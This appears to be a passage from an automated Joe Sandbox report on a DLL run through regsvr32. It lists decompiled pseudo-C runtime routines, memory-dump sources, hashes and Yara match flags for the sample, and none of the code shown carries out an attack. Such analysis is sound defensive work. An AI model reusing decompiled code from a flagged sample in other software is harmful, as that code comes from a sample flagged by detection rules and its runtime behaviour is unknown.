                                                                                                          				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
                                                                                                          				memset(_t52, _t26, 0 << 0);
                                                                                                          				_t126 =  *0x80021010; // 0x268a0197523d
                                                                                                          				r8d = 0x40;
                                                                                                          				asm("dec eax");
                                                                                                          				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                                          				_t95 =  *0x80021010; // 0x268a0197523d
                                                                                                          				asm("dec eax");
                                                                                                          				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                                          				_t96 =  *0x80021010; // 0x268a0197523d
                                                                                                          				asm("dec eax");
                                                                                                          				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
                                                                                                          				_t98 =  *0x80021010; // 0x268a0197523d
                                                                                                          				r8d = r8d - (_t51 & 0x0000003f);
                                                                                                          				asm("dec eax");
                                                                                                          				( *( *_t132))[2] = _t77 ^ _t98;
                                                                                                          				goto 0x800069af;
                                                                                                          				return 0xffffffff;
                                                                                                          			}
























                                                                                                          0x180006818
                                                                                                          0x180006818
                                                                                                          0x180006818
                                                                                                          0x18000681d
                                                                                                          0x180006822
                                                                                                          0x180006830
                                                                                                          0x180006835
                                                                                                          0x180006838
                                                                                                          0x18000683e
                                                                                                          0x180006844
                                                                                                          0x180006851
                                                                                                          0x18000685a
                                                                                                          0x180006864
                                                                                                          0x180006868
                                                                                                          0x18000686b
                                                                                                          0x180006871
                                                                                                          0x18000687f
                                                                                                          0x180006889
                                                                                                          0x18000688d
                                                                                                          0x180006890
                                                                                                          0x180006893
                                                                                                          0x18000689a
                                                                                                          0x18000689c
                                                                                                          0x18000689c
                                                                                                          0x1800068a6
                                                                                                          0x1800068b0
                                                                                                          0x1800068b8
                                                                                                          0x1800068ba
                                                                                                          0x1800068be
                                                                                                          0x1800068ca
                                                                                                          0x1800068d1
                                                                                                          0x1800068d4
                                                                                                          0x1800068dc
                                                                                                          0x1800068e9
                                                                                                          0x1800068ed
                                                                                                          0x180006905
                                                                                                          0x180006909
                                                                                                          0x18000690c
                                                                                                          0x180006914
                                                                                                          0x180006917
                                                                                                          0x18000691e
                                                                                                          0x18000693d
                                                                                                          0x180006943
                                                                                                          0x180006946
                                                                                                          0x180006959
                                                                                                          0x180006962
                                                                                                          0x180006968
                                                                                                          0x180006979
                                                                                                          0x180006982
                                                                                                          0x180006986
                                                                                                          0x180006992
                                                                                                          0x18000699b
                                                                                                          0x1800069a6
                                                                                                          0x1800069aa
                                                                                                          0x1800069c7

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 485612231-0
                                                                                                          • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                          • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                                          • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                          • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                          • Instruction ID: 7b25df0c9c0f417421b7cc5027d250eb51d2e0c649ba6d8e64554cd8d5f12e70
                                                                                                          • Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                          • Instruction Fuzzy Hash: E551A2B090474E8FDB48CF68D48A5DE7FB0FB68398F204619E81596250D7B4D6A5CFC4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                          • Instruction ID: 11e44afc0f971332ce46033fa20d055e67240aa8c0e8900597ff96648ae0f32e
                                                                                                          • Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                          • Instruction Fuzzy Hash: 535129709047498BDF48CF68C8895DEBBF1FB48318F11475CE88AA7260D7789A44CF49
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                          • Instruction ID: bda2f1df8810ab350429250440f6cd48490b2f2507c8c5ea7a842a5ea4ecb908
                                                                                                          • Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                          • Instruction Fuzzy Hash: 0951A4B090438E8FDB88CF68D88A5CE7BF0FB58358F105619F865A6250D3B8D664CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                          • Instruction ID: 9ba47ff330e0a807df209010496212f4a576804960b4ab55d4114aceb03c48bf
                                                                                                          • Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                          • Instruction Fuzzy Hash: 42519DB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19F825A6250D3B8D665CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                          • Instruction ID: a4d3ff1b5d838e451b92de60c614ade821af9004a00449e68cc48df5d784a801
                                                                                                          • Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                          • Instruction Fuzzy Hash: 8141C3B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                          • Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
                                                                                                          • Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                          • Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                          • Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
                                                                                                          • Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                          • Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                          • Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
                                                                                                          • Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                          • Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                          • Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
                                                                                                          • Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                          • Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 86%
                                                                                                          			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                                          				intOrPtr _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				intOrPtr _v20;
                                                                                                          				void* _t25;
                                                                                                          
                                                                                                          				_t25 = __r8;
                                                                                                          				r8d = 0;
                                                                                                          				 *0x800223a8 = r8d;
                                                                                                          				_t1 = _t25 + 1; // 0x1
                                                                                                          				r9d = _t1;
                                                                                                          				asm("cpuid");
                                                                                                          				_v16 = r9d;
                                                                                                          				_v16 = 0;
                                                                                                          				_v20 = __ebx;
                                                                                                          				_v12 = __edx;
                                                                                                          				if (0 != 0x18001000) goto 0x80007101;
                                                                                                          				asm("xgetbv");
                                                                                                          				_a8 = __rdx << 0x00000020 | __rax;
                                                                                                          				r8d =  *0x800223a8; // 0x1
                                                                                                          				r8d =  ==  ? r9d : r8d;
                                                                                                          				 *0x800223a8 = r8d;
                                                                                                          				 *0x800223ac = r8d;
                                                                                                          				return 0;
                                                                                                          			}







                                                                                                          0x1800070a0
                                                                                                          0x1800070a6
                                                                                                          0x1800070ab
                                                                                                          0x1800070b2
                                                                                                          0x1800070b2
                                                                                                          0x1800070b9
                                                                                                          0x1800070bb
                                                                                                          0x1800070c3
                                                                                                          0x1800070c9
                                                                                                          0x1800070cd
                                                                                                          0x1800070d3
                                                                                                          0x1800070d7
                                                                                                          0x1800070e1
                                                                                                          0x1800070eb
                                                                                                          0x1800070f6
                                                                                                          0x1800070fa
                                                                                                          0x180007101
                                                                                                          0x18000710f

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                          • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                                          • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                          • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: GestureInfo$CloseHandle
                                                                                                          • String ID: 8
                                                                                                          • API String ID: 372500805-4194326291
                                                                                                          • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                          • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                                          • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                          • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                          • String ID: i
                                                                                                          • API String ID: 3181456275-3865851505
                                                                                                          • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                          • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                                          • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                          • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                          • String ID:
                                                                                                          • API String ID: 1917832262-0
                                                                                                          • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                          • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                                          • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                          • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 66%
                                                                                                          			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
                                                                                                          				void* __rbx;
                                                                                                          				void* __rdi;
                                                                                                          				void* __rsi;
                                                                                                          				void* __rbp;
                                                                                                          				signed int* _t128;
                                                                                                          				void* _t145;
                                                                                                          				intOrPtr _t146;
                                                                                                          				intOrPtr _t154;
                                                                                                          				void* _t173;
                                                                                                          				intOrPtr _t176;
                                                                                                          				signed int _t177;
                                                                                                          				signed int _t178;
                                                                                                          				void* _t209;
                                                                                                          				signed long long _t219;
                                                                                                          				signed long long _t220;
                                                                                                          				signed long long _t226;
                                                                                                          				long long _t228;
                                                                                                          				signed int _t235;
                                                                                                          				intOrPtr* _t236;
                                                                                                          				intOrPtr* _t237;
                                                                                                          				signed long long _t246;
                                                                                                          				long long _t267;
                                                                                                          				signed int* _t280;
                                                                                                          				long long _t281;
                                                                                                          				void* _t282;
                                                                                                          				void* _t283;
                                                                                                          				signed long long _t284;
                                                                                                          				long long _t296;
                                                                                                          				signed int _t307;
                                                                                                          				unsigned long long _t313;
                                                                                                          
                                                                                                          				_t180 = __esi;
                                                                                                          				_t282 = _t283 - 0x28;
                                                                                                          				_t284 = _t283 - 0x128;
                                                                                                          				_t219 =  *0x80021010; // 0x268a0197523d
                                                                                                          				_t220 = _t219 ^ _t284;
                                                                                                          				 *(_t282 + 0x10) = _t220;
                                                                                                          				_t280 =  *((intOrPtr*)(_t282 + 0x90));
                                                                                                          				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
                                                                                                          				 *((long long*)(_t284 + 0x68)) = __r8;
                                                                                                          				_t236 = __rcx;
                                                                                                          				 *((long long*)(_t284 + 0x78)) = __rdx;
                                                                                                          				 *(_t282 - 0x68) = _t307;
                                                                                                          				 *((char*)(_t284 + 0x60)) = 0;
                                                                                                          				_t281 = __r9;
                                                                                                          				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
                                                                                                          				r14d = _t128;
                                                                                                          				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
                                                                                                          				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
                                                                                                          				if ( *_t236 != 0xe06d7363) goto 0x80003474;
                                                                                                          				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
                                                                                                          				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
                                                                                                          				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
                                                                                                          				E00000001180002D40(_t220);
                                                                                                          				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
                                                                                                          				E00000001180002D40(_t220);
                                                                                                          				_t237 =  *((intOrPtr*)(_t220 + 0x20));
                                                                                                          				E00000001180002D40(_t220);
                                                                                                          				 *((char*)(_t284 + 0x60)) = 1;
                                                                                                          				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
                                                                                                          				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
                                                                                                          				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
                                                                                                          				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
                                                                                                          				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
                                                                                                          				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
                                                                                                          				E00000001180002D40(_t220);
                                                                                                          				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
                                                                                                          				E00000001180002D40(_t220);
                                                                                                          				E00000001180002D40(_t220);
                                                                                                          				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
                                                                                                          				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
                                                                                                          				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
                                                                                                          				goto 0x800037b0;
                                                                                                          				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
                                                                                                          				 *(_t282 - 0x48) = _t280;
                                                                                                          				if ( *_t237 != 0xe06d7363) goto 0x80003747;
                                                                                                          				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
                                                                                                          				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
                                                                                                          				r15d = 0;
                                                                                                          				if (_t280[3] - r15d <= 0) goto 0x80003678;
                                                                                                          				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
                                                                                                          				 *(_t284 + 0x20) = _t280;
                                                                                                          				r8d = r14d;
                                                                                                          				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
                                                                                                          				asm("movups xmm0, [ebp-0x28]");
                                                                                                          				asm("movdqu [ebp-0x38], xmm0");
                                                                                                          				asm("psrldq xmm0, 0x8");
                                                                                                          				asm("movd eax, xmm0");
                                                                                                          				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
                                                                                                          				_t296 =  *((intOrPtr*)(_t282 - 0x28));
                                                                                                          				r13d =  *((intOrPtr*)(_t282 - 0x30));
                                                                                                          				 *((long long*)(_t282 - 0x80)) = _t296;
                                                                                                          				_t146 = r13d;
                                                                                                          				asm("inc ecx");
                                                                                                          				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
                                                                                                          				asm("movd eax, xmm0");
                                                                                                          				asm("movups [ebp-0x60], xmm0");
                                                                                                          				if (_t146 - r14d > 0) goto 0x8000366b;
                                                                                                          				_t226 =  *(_t282 - 0x60) >> 0x20;
                                                                                                          				if (r14d - _t146 > 0) goto 0x8000366b;
                                                                                                          				r12d = r15d;
                                                                                                          				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
                                                                                                          				_t313 =  *(_t282 - 0x58) >> 0x20;
                                                                                                          				 *((long long*)(_t282 - 0x70)) = _t267;
                                                                                                          				if (r15d == 0) goto 0x80003658;
                                                                                                          				_t246 = _t226 + _t226 * 4;
                                                                                                          				asm("movups xmm0, [edx+ecx*4]");
                                                                                                          				asm("movups [ebp-0x8], xmm0");
                                                                                                          				_t59 = _t246 * 4; // 0x48ccccc35f40c483
                                                                                                          				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
                                                                                                          				E0000000118000241C(_t226);
                                                                                                          				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
                                                                                                          				 *((long long*)(_t284 + 0x70)) = _t228;
                                                                                                          				E0000000118000241C(_t228);
                                                                                                          				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
                                                                                                          				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
                                                                                                          				if (_t176 <= 0) goto 0x800035e8;
                                                                                                          				E0000000118000241C(_t228);
                                                                                                          				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
                                                                                                          				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
                                                                                                          				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
                                                                                                          				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
                                                                                                          				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
                                                                                                          				if (_t154 > 0) goto 0x800035ac;
                                                                                                          				r12d = r12d + 1;
                                                                                                          				if (r12d == r15d) goto 0x8000365f;
                                                                                                          				goto 0x80003565;
                                                                                                          				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                          				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
                                                                                                          				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
                                                                                                          				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
                                                                                                          				 *(_t284 + 0x38) = _t282 - 0x60;
                                                                                                          				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
                                                                                                          				 *(_t284 + 0x28) = _t282 - 8;
                                                                                                          				 *(_t284 + 0x20) = _t280;
                                                                                                          				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
                                                                                                          				goto 0x80003664;
                                                                                                          				goto 0x80003668;
                                                                                                          				r15d = 0;
                                                                                                          				r13d = r13d + 1;
